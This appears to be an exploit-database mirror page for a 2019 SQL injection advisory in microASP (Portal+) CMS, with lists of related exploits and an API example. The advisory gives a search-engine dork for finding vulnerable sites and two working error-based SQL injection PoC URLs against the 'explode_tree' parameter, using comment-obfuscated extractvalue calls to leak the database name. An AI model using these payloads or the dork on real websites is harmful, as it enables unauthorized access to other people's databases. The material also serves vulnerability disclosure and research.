Menu

Improved exploit search engine. Try it out

"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection"

Author

"felipe andrian"

Platform

asp

Release date

2019-05-06

Release Date Title Type Platform Author
2019-05-06 "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" webapps asp "felipe andrian"
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2018-11-05 "Advantech WebAccess SCADA 8.3.2 - Remote Code Execution" webapps asp "Chris Lyne"
2018-05-29 "IssueTrak 7.0 - SQL Injection" webapps asp "Chris Anastasio"
2018-05-24 "ASP.NET jVideo Kit - 'query' SQL Injection" webapps asp AkkuS
2018-05-16 "totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery" webapps asp "Compass Security"
2018-03-30 "Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)" webapps asp "Todor Donev"
2018-03-30 "Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W316R Wireless Router 5.07.50 - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change" webapps asp "Todor Donev"
2017-08-31 "Sitefinity CMS 9.2 - Cross-Site Scripting" webapps asp "Pralhad Chaskar"
2017-09-22 "JitBit HelpDesk < 9.0.2 - Authentication Bypass" webapps asp Kc57
2017-09-18 "DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-18 "Digileave 1.2 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-18 "Digirez 3.4 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-13 "ICAffiliateTracking 1.1 - Authentication Bypass" webapps asp "Ihsan Sencan"
2017-06-05 "Kronos Telestaff < 2.92EU29 - SQL Injection" webapps asp "Goran Tuzovic"
2018-02-16 "EPIC MyChart - X-Path Injection" webapps asp "Shayan S"
2015-09-28 "Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload" webapps asp "Pedro Ribeiro"
2014-08-23 "LiveWorld Multiple Products - Cross Site Scripting" webapps asp "GulfTech Security"
2003-12-18 "ASPapp Multiple Products - Multiple Vulnerabilities" webapps asp "GulfTech Security"
2003-12-15 "DUWare Multiple Products - Multiple Vulnerabilities" webapps asp "GulfTech Security"
2016-06-07 "Cisco EPC 3928 - Multiple Vulnerabilities" webapps asp "Patryk Bogdan"
2016-06-06 "Notilus Travel Solution Software 2012 R3 - SQL Injection" webapps asp "Alex Haynes"
2016-05-24 "AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection" webapps asp "Mehmet Ince"
2016-05-06 "DotNetNuke 07.04.00 - Administration Authentication Bypass" webapps asp "Marios Nicolaides"
2016-02-22 "Thru Managed File Transfer Portal 9.0.2 - SQL Injection" webapps asp "SySS GmbH"
2016-01-13 "WhatsUp Gold 16.3 - Remote Code Execution" webapps asp "Matt Buzanowski"
2014-05-16 "CIS Manager - 'email' SQL Injection" webapps asp Edge
2014-02-22 "eshtery CMS - 'FileManager.aspx' Local File Disclosure" webapps asp peng.deng
Release Date Title Type Platform Author
2019-05-13 "XOOPS 2.5.9 - SQL Injection" webapps php "felipe andrian"
2019-05-06 "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" webapps asp "felipe andrian"
2019-05-06 "PHPads 2.0 - 'click.php3?bannerID' SQL Injection" webapps php "felipe andrian"
2014-05-24 "Web Terra 1.1 - 'books.cgi' Remote Command Execution" webapps cgi "felipe andrian"
2014-04-14 "WordPress Theme LineNity 1.20 - Local File Inclusion" webapps php "felipe andrian"
2014-04-02 "CIS Manager CMS - SQL Injection" webapps asp "felipe andrian"
2014-04-01 "Horde Webmail 5.1 - Open Redirect" webapps php "felipe andrian"
2014-03-29 "ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect" webapps asp "felipe andrian"
2014-03-24 "BigDump 0.35b - Arbitrary File Upload" webapps php "felipe andrian"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46799/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46799/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46799/41237/microasp-portal-cms-paginaphtmlexplode_tree-sql-injection/download/", "exploit_id": "46799", "exploit_description": "\"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection\"", "exploit_date": "2019-05-06", "exploit_author": "\"felipe andrian\"", "exploit_type": "webapps", "exploit_platform": "asp", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
[+] Sql Injection on microASP (Portal+) CMS

[+] Date: 05/05/2019

[+] Risk: High

[+] CWE Number : CWE-89

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://www.microasp.it/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)

[+] Exploit : 

        http://host/patch/pagina.phtml?explode_tree= [SQL Injection]

[+] PoC : 
 
   https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
   https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
   
[+] EOF